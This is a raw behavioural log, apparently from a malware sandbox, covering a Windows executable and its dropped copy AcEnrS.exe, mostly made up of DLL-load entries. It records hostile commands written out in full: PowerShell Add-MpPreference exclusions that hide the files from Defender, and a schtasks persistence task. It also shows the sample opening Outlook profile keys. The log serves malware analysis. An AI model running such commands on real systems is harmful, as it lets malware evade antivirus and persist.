                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Users\user\AppData\Roaming\AcEnrS.exe "C:\Users\user\AppData\Roaming\AcEnrS.exe"
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Users\user\AppData\Roaming\AcEnrS.exe "C:\Users\user\AppData\Roaming\AcEnrS.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: WIpGif4IRrFfamQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: WIpGif4IRrFfamQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: WIpGif4IRrFfamQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.pdbMZ@ source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: @o.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl=neutral source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: n(C:\Windows\UJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb'Pw source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\UJLf.pdbSpyv source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbe source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: !!.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\UJLf.pdbpdbJLf.pdbN source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UJLf.pdb?? source: AcEnrS.exe, 0000000E.00000002.2401454190.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: UJLf.pdb source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
